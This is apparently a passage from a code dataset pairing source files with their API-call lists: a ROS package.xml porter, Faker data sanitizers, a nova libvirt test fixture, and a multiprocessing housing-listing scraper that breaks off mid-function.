"drydock_provisioner.objects.HostInterface",
"drydock_provisioner.objects.Repository",
"yaml.dump",
"drydock_provisioner.objects.Rack",
"drydock_provisioner.objects.TorSwitchList",
"drydock_provisioner.objects.NetworkLink",
"beaker.util.parse_cache_config_options",
"drydock_provisioner.objects.NodeFilterSet",
"drydock_provisioner.objects.HostPartitionList",
"drydock_provisioner.objects.NodeTagDefinitionList",
"yaml.safe_load_all",
"os.path.join",
"pkg_resources.resource_filename",
"drydock_provisioner.objects.NodeFilter",
"drydock_provisioner.objects.HugepagesConfList",
"drydock_provisioner.objects.HostPartition"
]
| [((1180, 1218), 'beaker.util.parse_cache_config_options', 'parse_cache_config_options', (['cache_opts'], {}), '(cache_opts)\n', (1206, 1218), False, 'from beaker.util import parse_cache_config_options\n'), ((1334, 1380), 'logging.getLogger', 'logging.getLogger', (['"""drydock.ingester.deckhand"""'], {}), "('drydock.ingester.deckhand')\n", (1351, 1380), False, 'import logging\n'), ((3530, 3550), 'drydock_provisioner.objects.Validation', 'objects.Validation', ([], {}), '()\n', (3548, 3550), False, 'from drydock_provisioner import objects\n'), ((8787, 8801), 'drydock_provisioner.objects.Site', 'objects.Site', ([], {}), '()\n', (8799, 8801), False, 'from drydock_provisioner import objects\n'), ((9058, 9089), 'drydock_provisioner.objects.NodeTagDefinitionList', 'objects.NodeTagDefinitionList', ([], {}), '()\n', (9087, 9089), False, 'from drydock_provisioner import objects\n'), ((10144, 10168), 'drydock_provisioner.objects.RepositoryList', 'objects.RepositoryList', ([], {}), '()\n', (10166, 10168), False, 'from drydock_provisioner import objects\n'), ((10636, 10650), 'drydock_provisioner.objects.Rack', 'objects.Rack', ([], {}), '()\n', (10648, 10650), False, 'from drydock_provisioner import objects\n'), ((10762, 10785), 'drydock_provisioner.objects.TorSwitchList', 'objects.TorSwitchList', ([], {}), '()\n', (10783, 10785), False, 'from drydock_provisioner import objects\n'), ((11511, 11532), 'drydock_provisioner.objects.NetworkLink', 'objects.NetworkLink', ([], {}), '()\n', (11530, 11532), False, 'from drydock_provisioner import objects\n'), ((13100, 13117), 'drydock_provisioner.objects.Network', 'objects.Network', ([], {}), '()\n', (13115, 13117), False, 'from drydock_provisioner import objects\n'), ((14760, 14785), 'drydock_provisioner.objects.HardwareProfile', 'objects.HardwareProfile', ([], {}), '()\n', (14783, 14785), False, 'from drydock_provisioner import objects\n'), ((15301, 15334), 'drydock_provisioner.objects.HardwareDeviceAliasList', 'objects.HardwareDeviceAliasList', ([], {}), '()\n', (15332, 15334), False, 'from drydock_provisioner import objects\n'), ((15894, 15921), 'drydock_provisioner.objects.HugepagesConfList', 'objects.HugepagesConfList', ([], {}), '()\n', (15919, 15921), False, 'from drydock_provisioner import objects\n'), ((16418, 16439), 'drydock_provisioner.objects.HostProfile', 'objects.HostProfile', ([], {}), '()\n', (16437, 16439), False, 'from drydock_provisioner import objects\n'), ((16864, 16884), 'drydock_provisioner.objects.BootAction', 'objects.BootAction', ([], {}), '()\n', (16882, 16884), False, 'from drydock_provisioner import objects\n'), ((17030, 17059), 'drydock_provisioner.objects.BootActionAssetList', 'objects.BootActionAssetList', ([], {}), '()\n', (17057, 17059), False, 'from drydock_provisioner import objects\n'), ((17668, 17705), 'drydock_provisioner.objects.BootActionAsset', 'objects.BootActionAsset', ([], {}), '(**asset_dict)\n', (17691, 17705), False, 'from drydock_provisioner import objects\n'), ((17954, 17977), 'drydock_provisioner.objects.NodeFilterSet', 'objects.NodeFilterSet', ([], {}), '()\n', (17975, 17977), False, 'from drydock_provisioner import objects\n'), ((18491, 18514), 'drydock_provisioner.objects.BaremetalNode', 'objects.BaremetalNode', ([], {}), '()\n', (18512, 18514), False, 'from drydock_provisioner import objects\n'), ((19001, 19034), 'drydock_provisioner.objects.IpAddressAssignmentList', 'objects.IpAddressAssignmentList', ([], {}), '()\n', (19032, 19034), False, 'from drydock_provisioner import objects\n'), ((20800, 20827), 'drydock_provisioner.objects.HostInterfaceList', 'objects.HostInterfaceList', ([], {}), '()\n', (20825, 20827), False, 'from drydock_provisioner import objects\n'), ((22977, 23008), 'drydock_provisioner.objects.HostStorageDeviceList', 'objects.HostStorageDeviceList', ([], {}), '()\n', (23006, 23008), False, 'from drydock_provisioner import objects\n'), ((24675, 24704), 'drydock_provisioner.objects.HostVolumeGroupList', 'objects.HostVolumeGroupList', ([], {}), '()\n', (24702, 24704), False, 'from drydock_provisioner import objects\n'), ((25869, 25891), 'os.listdir', 'os.listdir', (['schema_dir'], {}), '(schema_dir)\n', (25879, 25891), False, 'import os\n'), ((26522, 26587), 'pkg_resources.resource_filename', 'pkg_resources.resource_filename', (['"""drydock_provisioner"""', '"""schemas"""'], {}), "('drydock_provisioner', 'schemas')\n", (26553, 26587), False, 'import pkg_resources\n'), ((3023, 3054), 'yaml.safe_load_all', 'yaml.safe_load_all', (['yaml_string'], {}), '(yaml_string)\n', (3041, 3054), False, 'import yaml\n'), ((7377, 7464), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Invalid document - Kind %s and Version %s' % (kind, version))"], {}), "('Invalid document - Kind %s and Version %s' % (kind,\n version))\n", (7397, 7464), True, 'from drydock_provisioner import error as errors\n'), ((9194, 9221), 'drydock_provisioner.objects.NodeTagDefinition', 'objects.NodeTagDefinition', ([], {}), '()\n', (9219, 9221), False, 'from drydock_provisioner import objects\n'), ((10883, 10902), 'drydock_provisioner.objects.TorSwitch', 'objects.TorSwitch', ([], {}), '()\n', (10900, 10902), False, 'from drydock_provisioner import objects\n'), ((15461, 15490), 'drydock_provisioner.objects.HardwareDeviceAlias', 'objects.HardwareDeviceAlias', ([], {}), '()\n', (15488, 15490), False, 'from drydock_provisioner import objects\n'), ((18140, 18164), 'drydock_provisioner.objects.NodeFilter', 'objects.NodeFilter', ([], {}), '(**nf)\n', (18158, 18164), False, 'from drydock_provisioner import objects\n'), ((18859, 18930), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (['"""BaremetalNode needs at least 1 assigned address"""'], {}), "('BaremetalNode needs at least 1 assigned address')\n", (18879, 18930), True, 'from drydock_provisioner import error as errors\n'), ((19089, 19118), 'drydock_provisioner.objects.IpAddressAssignment', 'objects.IpAddressAssignment', ([], {}), '()\n', (19116, 19118), False, 'from drydock_provisioner import objects\n'), ((20893, 20916), 'drydock_provisioner.objects.HostInterface', 'objects.HostInterface', ([], {}), '()\n', (20914, 20916), False, 'from drydock_provisioner import objects\n'), ((23066, 23099), 'drydock_provisioner.objects.HostStorageDevice', 'objects.HostStorageDevice', ([], {'name': 'k'}), '(name=k)\n', (23091, 23099), False, 'from drydock_provisioner import objects\n'), ((24817, 24848), 'drydock_provisioner.objects.HostVolumeGroup', 'objects.HostVolumeGroup', ([], {'name': 'k'}), '(name=k)\n', (24840, 24848), False, 'from drydock_provisioner import objects\n'), ((24930, 24954), 'drydock_provisioner.objects.HostVolumeList', 'objects.HostVolumeList', ([], {}), '()\n', (24952, 24954), False, 'from drydock_provisioner import objects\n'), ((25984, 26005), 'yaml.safe_load_all', 'yaml.safe_load_all', (['f'], {}), '(f)\n', (26002, 26005), False, 'import yaml\n'), ((9460, 9568), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Unknown definition_type in tag_definition instance: %s' % t.definition_type)"], {}), "(\n 'Unknown definition_type in tag_definition instance: %s' % t.\n definition_type)\n", (9480, 9568), True, 'from drydock_provisioner import error as errors\n'), ((25914, 25951), 'os.path.join', 'os.path.join', (['schema_dir', 'schema_file'], {}), '(schema_dir, schema_file)\n', (25926, 25951), False, 'import os\n'), ((3200, 3306), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Error parsing YAML at (l:%s, c:%s): %s' % (mark.line + 1, mark.column + 1,\n err))"], {}), "('Error parsing YAML at (l:%s, c:%s): %s' % (mark.line +\n 1, mark.column + 1, err))\n", (3220, 3306), True, 'from drydock_provisioner import error as errors\n'), ((3384, 3436), 'drydock_provisioner.error.IngesterError', 'errors.IngesterError', (["('Error parsing YAML: %s' % err)"], {}), "('Error parsing YAML: %s' % err)\n", (3404, 3436), True, 'from drydock_provisioner import error as errors\n'), ((10332, 10363), 'drydock_provisioner.objects.Repository', 'objects.Repository', ([], {'name': 'k'}), '(name=k, **v)\n', (10350, 10363), False, 'from drydock_provisioner import objects\n'), ((23422, 23449), 'drydock_provisioner.objects.HostPartitionList', 'objects.HostPartitionList', ([], {}), '()\n', (23447, 23449), False, 'from drydock_provisioner import objects\n'), ((23534, 23557), 'drydock_provisioner.objects.HostPartition', 'objects.HostPartition', ([], {}), '()\n', (23555, 23557), False, 'from drydock_provisioner import objects\n'), ((3995, 4007), 'yaml.dump', 'yaml.dump', (['d'], {}), '(d)\n', (4004, 4007), False, 'import yaml\n'), ((5637, 5862), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': 'msg', 'name': '"""DD000"""', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'docs': '[doc_ref]', 'diagnostic': '"""Exception during document processing - see Drydock Troubleshooting Guide for DD000"""'}), "(msg=msg, name='DD000', error=True, level=\n hd_fields.MessageLevels.ERROR, docs=[doc_ref], diagnostic=\n 'Exception during document processing - see Drydock Troubleshooting Guide for DD000'\n )\n", (5662, 5862), False, 'from drydock_provisioner import objects\n'), ((6386, 6622), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': 'msg', 'name': '"""DD000"""', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'docs': '[doc_ref]', 'diagnostic': '"""Unexpected exception during document processing - see Drydock Troubleshooting Guide for DD000"""'}), "(msg=msg, name='DD000', error=True, level=\n hd_fields.MessageLevels.ERROR, docs=[doc_ref], diagnostic=\n 'Unexpected exception during document processing - see Drydock Troubleshooting Guide for DD000'\n )\n", (6411, 6622), False, 'from drydock_provisioner import objects\n'), ((4583, 4850), 'drydock_provisioner.objects.ValidationMessage', 'objects.ValidationMessage', ([], {'msg': "('%s:%s schema validation error: %s' % (doc_kind, doc_version, e))", 'name': '"""DD001"""', 'docs': '[doc_ref]', 'error': '(True)', 'level': 'hd_fields.MessageLevels.ERROR', 'diagnostic': '"""Invalid input file - see Drydock Troubleshooting Guide for DD001"""'}), "(msg='%s:%s schema validation error: %s' % (\n doc_kind, doc_version, e), name='DD001', docs=[doc_ref], error=True,\n level=hd_fields.MessageLevels.ERROR, diagnostic=\n 'Invalid input file - see Drydock Troubleshooting Guide for DD001')\n", (4608, 4850), False, 'from drydock_provisioner import objects\n')] |
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
""" Contains a class and method for porting a package.xml file from catkin to ament"""
import xml.etree.ElementTree as etree
from .constants import CatkinToAmentMigration, PACKAGE_XML_ELEMENT_ORDER
from .utils import get_functions_with
def new_element(tag, text="", tail="\n", attrib=None):
""" Helper function to make creating an element with a text and tail easier """
if not attrib:
attrib = {}
element = etree.Element(tag, attrib=attrib)
element.text = text
element.tail = tail
return element
def tag_order(tag):
""" Returns integer to order tags """
if tag in PACKAGE_XML_ELEMENT_ORDER:
return PACKAGE_XML_ELEMENT_ORDER.index(tag)
return float("inf")
class PackageXMLPorter:
"""A class for porting a package.xml file from catkin to ament"""
@staticmethod
def port(tree, extra_rules=[]):
"""
Ports package.xml from catkin to ament
Arguments:
tree - the xml tree representing the package.xml file (output of etree.parse("package.xml"))
extra_rules - a list of functions to apply to the xml tree
Returns:
The new xml tree
"""
# Pulls out all methods in this class with name starting with "rule"
rules = get_functions_with(criteria=lambda name: name.startswith("rule"),
from_class=PackageXMLPorter)
package_root = tree.getroot()
for rule in rules + extra_rules:
rule(package_root)
# Make sure there's a final newline
package_root.tail = "\n"
# Reorder the elements
package_root[:] = sorted(list(package_root), key=lambda elem: tag_order(elem.tag))
# Correct indentation
PackageXMLPorter.indent_tree(elem=package_root, level=0)
#########################
# RULES #
#########################
@staticmethod
def rule_set_format(package_root):
# ROS 2 supports formats 2,3
package_root.set("format", "3")
@staticmethod
def rule_set_build_tool(package_root):
for elem in package_root.findall("buildtool_depend"):
if elem.text and elem.text.strip() == "catkin":
package_root.remove(elem)
package_root.append(new_element(tag="buildtool_depend", text="ament_cmake"))
@staticmethod
def rule_set_client_library(package_root):
for elem in list(package_root):
if elem.text and elem.text.strip() in CatkinToAmentMigration.CLIENT_CONVERSION:
elem.text = CatkinToAmentMigration.CLIENT_CONVERSION[elem.text.strip()]
@staticmethod
def rule_add_export_build_type(package_root):
build_elem = new_element(tag="build_type", text="ament_cmake", tail="\n ")
export_elem = new_element(tag="export", text="\n ")
export_elem.append(build_elem)
package_root.append(export_elem)
@staticmethod
def rule_set_run_to_exec_depend(package_root):
for elem in package_root.findall("run_depend"):
elem.tag = "exec_depend"
@staticmethod
def rule_set_depend_to_run_exec(package_root):
for elem in package_root.findall("depend"):
elem.tag = "build_depend"
package_root.append(new_element(tag="exec_depend", text=elem.text, attrib=elem.attrib))
@staticmethod
def rule_update_message_gen_dependency(package_root):
message_generation_used = False
for elem in list(package_root):
if elem.text and elem.text == "message_generation" or elem.text == "message_runtime":
package_root.remove(elem)
message_generation_used = True
if message_generation_used:
package_root.append(new_element(tag="buildtool_depend", text="rosidl_default_generators"))
package_root.append(new_element(tag="build_depend", text="builtin_interfaces"))
package_root.append(new_element(tag="exec_depend", text="builtin_interfaces"))
package_root.append(new_element(tag="exec_depend", text="rosidl_default_runtime"))
package_root.append(new_element(tag="member_of_group", text="rosidl_interface_packages"))
#########################
# HELPERS #
#########################
@staticmethod
def indent_tree(elem, level):
if len(elem) > 0: # element has children
if elem.text is None or len(elem.text) == 0:
elem.text = "\n" + (" "*(level+1)) # sets the indent for the children
list(elem)[-1].tail = "\n" + " "*level
for child in list(elem)[:-1]:
child.tail = "\n" + (" "*(level+1))
PackageXMLPorter.indent_tree(elem=child, level=level+1)
if __name__ == '__main__':
tree = etree.parse("package.xml")
PackageXMLPorter.port(tree=tree)
tree.write("updated_package.xml", encoding="utf-8", xml_declaration=True)
| [
"xml.etree.ElementTree.Element",
"xml.etree.ElementTree.parse"
]
| [((1008, 1041), 'xml.etree.ElementTree.Element', 'etree.Element', (['tag'], {'attrib': 'attrib'}), '(tag, attrib=attrib)\n', (1021, 1041), True, 'import xml.etree.ElementTree as etree\n'), ((5375, 5401), 'xml.etree.ElementTree.parse', 'etree.parse', (['"""package.xml"""'], {}), "('package.xml')\n", (5386, 5401), True, 'import xml.etree.ElementTree as etree\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import random
from random import choice
from string import digits
from faker import Faker
fake = Faker("fi_FI")
def sanitize_address(value):
return fake.address()
def sanitize_address_if_exist(value):
if value:
return sanitize_address(value)
def sanitize_business_id(value):
return fake.pystr_format(string_format="#######-#", letters="0123456789")
def sanitize_business_id_if_exist(value):
if value:
return sanitize_business_id(value)
def sanitize_city(value):
return fake.city()
def sanitize_city_if_exist(value):
if value:
return sanitize_city(value)
def sanitize_company(value):
return fake.company()
def sanitize_company_if_exist(value):
if value:
return sanitize_company(value)
def sanitize_email(value):
return fake.email()
def sanitize_email_if_exist(value):
if value:
return sanitize_email(value)
def sanitize_first_name(value):
return fake.first_name()
def sanitize_first_name_if_exist(value):
if value:
return sanitize_first_name(value)
def sanitize_generate_random_numbers(value):
return "".join([choice(digits) for i in range(random.randint(0, 10))])
def sanitize_generate_random_numbers_if_exist(value):
if value:
return sanitize_generate_random_numbers(value)
def sanitize_last_name(value):
return fake.first_name()
def sanitize_last_name_if_exist(value):
if value:
return sanitize_last_name(value)
def sanitize_national_identification_number(value):
return fake.pystr_format(string_format="######-####", letters="0123456789")
def sanitize_national_identification_number_if_exist(value):
if value:
return sanitize_national_identification_number(value)
def sanitize_name(value):
return fake.name()
def sanitize_paragraph(value):
return fake.paragraph()
def sanitize_paragraph_if_exist(value):
if value:
return sanitize_paragraph(value)
def sanitize_phone_number(value):
return fake.phone_number()
def sanitize_phone_number_if_exist(value):
if value:
return sanitize_phone_number(value)
def sanitize_postcode(value):
return fake.postcode()
def sanitize_postcode_if_exist(value):
if value:
return sanitize_postcode(value)
def sanitize_url(value):
return fake.url()
| [
"faker.Faker",
"random.choice",
"random.randint"
]
| [((164, 178), 'faker.Faker', 'Faker', (['"""fi_FI"""'], {}), "('fi_FI')\n", (169, 178), False, 'from faker import Faker\n'), ((1202, 1216), 'random.choice', 'choice', (['digits'], {}), '(digits)\n', (1208, 1216), False, 'from random import choice\n'), ((1232, 1253), 'random.randint', 'random.randint', (['(0)', '(10)'], {}), '(0, 10)\n', (1246, 1253), False, 'import random\n')] |
# Copyright 2012 Grid Dynamics
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import os
import fixtures
import mock
from nova.virt.libvirt import config
from nova.virt.libvirt import driver
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import utils as libvirt_utils
class ImageBackendFixture(fixtures.Fixture):
def __init__(self, got_files=None, imported_files=None, exists=None):
"""This fixture mocks imagebackend.Backend.backend, which is the
only entry point to libvirt.imagebackend from libvirt.driver.
:param got_files: A list of {'filename': path, 'size': size} for every
file which was created.
:param imported_files: A list of (local_filename, remote_filename) for
every invocation of import_file().
:param exists: An optional lambda which takes the disk name as an
argument, and returns True if the disk exists,
False otherwise.
"""
self.got_files = got_files
self.imported_files = imported_files
self.disks = collections.defaultdict(self._mock_disk)
"""A dict of name -> Mock image object. This is a defaultdict,
so tests may access it directly before a disk has been created."""
self._exists = exists
def setUp(self):
super(ImageBackendFixture, self).setUp()
# Mock template functions passed to cache
self.mock_fetch_image = mock.create_autospec(libvirt_utils.fetch_image)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.utils.fetch_image', self.mock_fetch_image))
self.mock_fetch_raw_image = \
mock.create_autospec(libvirt_utils.fetch_raw_image)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.utils.fetch_raw_image',
self.mock_fetch_raw_image))
self.mock_create_ephemeral = \
mock.create_autospec(driver.LibvirtDriver._create_ephemeral)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral',
self.mock_create_ephemeral))
self.mock_create_swap = \
mock.create_autospec(driver.LibvirtDriver._create_swap)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.LibvirtDriver._create_swap',
self.mock_create_swap))
# Backend.backend creates all Image objects
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.imagebackend.Backend.backend',
self._mock_backend))
@property
def created_disks(self):
"""disks, filtered to contain only disks which were actually created
by calling a relevant method.
"""
# A disk was created iff either cache() or import_file() was called.
return {name: disk for name, disk in self.disks.items()
if any([disk.cache.called, disk.import_file.called])}
def _mock_disk(self):
# This is the generator passed to the disks defaultdict. It returns
# a mocked Image object, but note that the returned object has not
# yet been 'constructed'. We don't know at this stage what arguments
# will be passed to the constructor, so we don't know, eg, its type
# or path.
#
# The reason for this 2 phase construction is to allow tests to
# manipulate mocks for disks before they have been created. eg a
# test can do the following before executing the method under test:
#
# disks['disk'].cache.side_effect = ImageNotFound...
#
# When the 'constructor' (image_init in _mock_backend) later runs,
# it will return the same object we created here, and when the
# caller calls cache() it will raise the requested exception.
disk = mock.create_autospec(imagebackend.Image)
# NOTE(mdbooth): fake_cache and fake_import_file are for compatibility
# with existing tests which test got_files and imported_files. They
# should be removed when they have no remaining users.
disk.cache.side_effect = self._fake_cache
disk.import_file.side_effect = self._fake_import_file
# NOTE(mdbooth): test_virt_drivers assumes libvirt_info has functional
# output
disk.libvirt_info.side_effect = \
functools.partial(self._fake_libvirt_info, disk)
return disk
def _mock_backend(self, backend_self, image_type=None):
# This method mocks Backend.backend, which returns a subclass of Image
# (it returns a class, not an instance). This mocked method doesn't
# return a class; it returns a function which returns a Mock. IOW,
# instead of the getting a QCow2, the caller gets image_init,
# so instead of:
#
# QCow2(instance, disk_name='disk')
#
# the caller effectively does:
#
# image_init(instance, disk_name='disk')
#
# Therefore image_init() must have the same signature as an Image
# subclass constructor, and return a mocked Image object.
#
# The returned mocked Image object has the following additional
# properties which are useful for testing:
#
# * Calls with the same disk_name return the same object from
# self.disks. This means tests can assert on multiple calls for
# the same disk without worrying about whether they were also on
# the same object.
#
# * Mocked objects have an additional image_type attribute set to
# the image_type originally passed to Backend.backend() during
# their construction. Tests can use this to assert that disks were
# created of the expected type.
def image_init(instance=None, disk_name=None, path=None):
# There's nothing special about this path except that it's
# predictable and unique for (instance, disk).
if path is None:
path = os.path.join(
libvirt_utils.get_instance_path(instance), disk_name)
else:
disk_name = os.path.basename(path)
disk = self.disks[disk_name]
# Used directly by callers. These would have been set if called
# the real constructor.
setattr(disk, 'path', path)
setattr(disk, 'is_block_dev', mock.sentinel.is_block_dev)
# Used by tests. Note that image_init is a closure over image_type.
setattr(disk, 'image_type', image_type)
# Used by tests to manipulate which disks exist.
if self._exists is not None:
# We don't just cache the return value here because the
# caller may want, eg, a test where the disk initially does not
# exist and later exists.
disk.exists.side_effect = lambda: self._exists(disk_name)
else:
disk.exists.return_value = True
return disk
# Set the SUPPORTS_CLONE member variable to mimic the Image base
# class.
image_init.SUPPORTS_CLONE = False
# Ditto for the 'is_shared_block_storage' function and
# 'is_file_in_instance_path'
def is_shared_block_storage():
return False
def is_file_in_instance_path():
return False
setattr(image_init, 'is_shared_block_storage', is_shared_block_storage)
setattr(image_init, 'is_file_in_instance_path',
is_file_in_instance_path)
return image_init
def _fake_cache(self, fetch_func, filename, size=None, *args, **kwargs):
# Execute the template function so we can test the arguments it was
# called with.
fetch_func(target=filename, *args, **kwargs)
# For legacy tests which use got_files
if self.got_files is not None:
self.got_files.append({'filename': filename, 'size': size})
def _fake_import_file(self, instance, local_filename, remote_filename):
# For legacy tests which use imported_files
if self.imported_files is not None:
self.imported_files.append((local_filename, remote_filename))
def _fake_libvirt_info(self, mock_disk, disk_info, cache_mode,
extra_specs, hypervisor_version, disk_unit=None):
# For tests in test_virt_drivers which expect libvirt_info to be
# functional
info = config.LibvirtConfigGuestDisk()
info.source_type = 'file'
info.source_device = disk_info['type']
info.target_bus = disk_info['bus']
info.target_dev = disk_info['dev']
info.driver_cache = cache_mode
info.driver_format = 'raw'
info.source_path = mock_disk.path
return info
| [
"fixtures.MonkeyPatch",
"nova.virt.libvirt.config.LibvirtConfigGuestDisk",
"mock.create_autospec",
"functools.partial",
"collections.defaultdict",
"os.path.basename",
"nova.virt.libvirt.utils.get_instance_path"
]
| [((1711, 1751), 'collections.defaultdict', 'collections.defaultdict', (['self._mock_disk'], {}), '(self._mock_disk)\n', (1734, 1751), False, 'import collections\n'), ((2083, 2130), 'mock.create_autospec', 'mock.create_autospec', (['libvirt_utils.fetch_image'], {}), '(libvirt_utils.fetch_image)\n', (2103, 2130), False, 'import mock\n'), ((2303, 2354), 'mock.create_autospec', 'mock.create_autospec', (['libvirt_utils.fetch_raw_image'], {}), '(libvirt_utils.fetch_raw_image)\n', (2323, 2354), False, 'import mock\n'), ((2548, 2608), 'mock.create_autospec', 'mock.create_autospec', (['driver.LibvirtDriver._create_ephemeral'], {}), '(driver.LibvirtDriver._create_ephemeral)\n', (2568, 2608), False, 'import mock\n'), ((2815, 2870), 'mock.create_autospec', 'mock.create_autospec', (['driver.LibvirtDriver._create_swap'], {}), '(driver.LibvirtDriver._create_swap)\n', (2835, 2870), False, 'import mock\n'), ((4492, 4532), 'mock.create_autospec', 'mock.create_autospec', (['imagebackend.Image'], {}), '(imagebackend.Image)\n', (4512, 4532), False, 'import mock\n'), ((5015, 5063), 'functools.partial', 'functools.partial', (['self._fake_libvirt_info', 'disk'], {}), '(self._fake_libvirt_info, disk)\n', (5032, 5063), False, 'import functools\n'), ((9178, 9209), 'nova.virt.libvirt.config.LibvirtConfigGuestDisk', 'config.LibvirtConfigGuestDisk', ([], {}), '()\n', (9207, 9209), False, 'from nova.virt.libvirt import config\n'), ((2155, 2242), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.utils.fetch_image"""', 'self.mock_fetch_image'], {}), "('nova.virt.libvirt.utils.fetch_image', self.\n mock_fetch_image)\n", (2175, 2242), False, 'import fixtures\n'), ((2379, 2474), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.utils.fetch_raw_image"""', 'self.mock_fetch_raw_image'], {}), "('nova.virt.libvirt.utils.fetch_raw_image', self.\n mock_fetch_raw_image)\n", (2399, 2474), False, 'import fixtures\n'), ((2633, 2746), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral"""', 'self.mock_create_ephemeral'], {}), "('nova.virt.libvirt.driver.LibvirtDriver._create_ephemeral'\n , self.mock_create_ephemeral)\n", (2653, 2746), False, 'import fixtures\n'), ((2895, 2997), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.driver.LibvirtDriver._create_swap"""', 'self.mock_create_swap'], {}), "('nova.virt.libvirt.driver.LibvirtDriver._create_swap',\n self.mock_create_swap)\n", (2915, 2997), False, 'import fixtures\n'), ((3097, 3192), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""nova.virt.libvirt.imagebackend.Backend.backend"""', 'self._mock_backend'], {}), "('nova.virt.libvirt.imagebackend.Backend.backend', self\n ._mock_backend)\n", (3117, 3192), False, 'import fixtures\n'), ((6835, 6857), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (6851, 6857), False, 'import os\n'), ((6735, 6776), 'nova.virt.libvirt.utils.get_instance_path', 'libvirt_utils.get_instance_path', (['instance'], {}), '(instance)\n', (6766, 6776), True, 'from nova.virt.libvirt import utils as libvirt_utils\n')] |
"""
第二版:多进程二手房信息爬虫
1. 将爬虫分解为下载任务和解析任务(可以继续分解,但在本案中意义不大)两部分,两部分各使用一个子进程,相互通过数据管道通信
2. 下载任务内部不使用队列,使用任务管道实现(在多进程:主进程、子进程、子进程内部进程池等场景下,队列并不好用)任务管理和通信
3. 解析任务从与下载任务间的管道中获取数据,解析并保存
问题:当目标被爬完后,怎样让爬虫停止?
"""
import csv
import datetime
import logging
import multiprocessing as mp
import re
import time
from collections import OrderedDict
import requests
from pyquery import PyQuery
from requests import RequestException
base_url = r'https://sh.lianjia.com/ershoufang'
# 已处理URL集合没有很好的表示方法,这里使用普通集合+锁来实现多进程场景下应用
seen_urls = set()
lock = mp.Lock()
# 下载失败重试次数
retries = 3
# 当前日期
today = datetime.date.today()
# 列表页、明细页URL正则表达式
list_page_pattern = '^{}/(pg\d+/)?$'.format(base_url)
item_page_pattern = '^{}/\d+.html$'.format(base_url)
# 数据存储路径
csv_file_path = r'../.data/ershoufang-{}.csv'.format(today)
# 日志配置
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(process)05d - %(levelname)s - %(message)s')
def start_download_job(data_writer, init_tasks):
"""
下载任务(作业)
:param data_writer: 数据管道(写)
:param init_tasks: 初始任务集合
:return:
"""
# 构造进程池,按CPU核数初始化进程池大小,小于4核以4为准,否则以CPU核数为准
pool_size = mp.cpu_count() > 4 and mp.cpu_count() or 4
pool = mp.Pool(pool_size)
# 任务不使用队列(在这种进程中使用子进程和进程池的应用中,队列会遇到各种问题),使用管道实现
(task_reader, task_writer) = mp.Pipe(duplex=False)
# 为了简化代码,初始任务直接通过任务管道发送出去,再接收
# 也可以直接在循环代码中实现,当初始任务集合为空时,再使用任务管道接收任务
task_writer.send(init_tasks)
# 循环从任务管道中读取任务数据,并进行处理
while True:
# 任务是一组URL
urls = task_reader.recv()
# 使用进程池,分别下载这些URL,将下载后的文档内容和url构成的元组通过管道发出
for url in urls:
# 判断任务是否重复
with lock:
if url in seen_urls:
continue
else:
seen_urls.add(url)
# 执行下载任务
pool.apply_async(download, (url, task_writer, data_writer))
pool.close()
pool.join()
def download(url, task_writer, data_writer):
"""
下载网页,最多重试3次
:param url: 下载url地址
:param task_writer: 任务管道(写)
:param data_writer: 数据管道(写)
:return:
"""
for _ in range(retries + 1):
try:
logging.info('download page {}'.format(url))
content = requests.get(url).text
if content is None:
continue
# 抽取列表页的中链接列表
if is_list_page(url):
links = parse_list_page(content, url)
# 将详情页链接列表通过管道发出去
if links and len(links) > 0:
task_writer.send(links)
else:
data_writer.send((content, url))
return
except RequestException:
# 异常时休眠2秒
time.sleep(2)
# 超过重试次数则打印错误消息
logging.error('重试{}次下载仍失败:{}'.format(retries, url))
# 将失败url重新加入任务队列
task_writer.send(set([url]))
def is_list_page(url):
"""
判断是否列表页
:param url:
:return:
"""
return re.match(list_page_pattern, url)
def parse_list_page(content, url):
"""
列表网页解析器
:param content:
:param url:
:return: 详情页链接集合
"""
pq = PyQuery(content, url=url)
return set([li.attr('href') for li in pq('ul.sellListContent div.title > a').items()])
def parse_item_page(content, url):
"""
详情页解析器
:param content:
:param url:
:return: 返回详情数据
"""
pq = PyQuery(content, url=url)
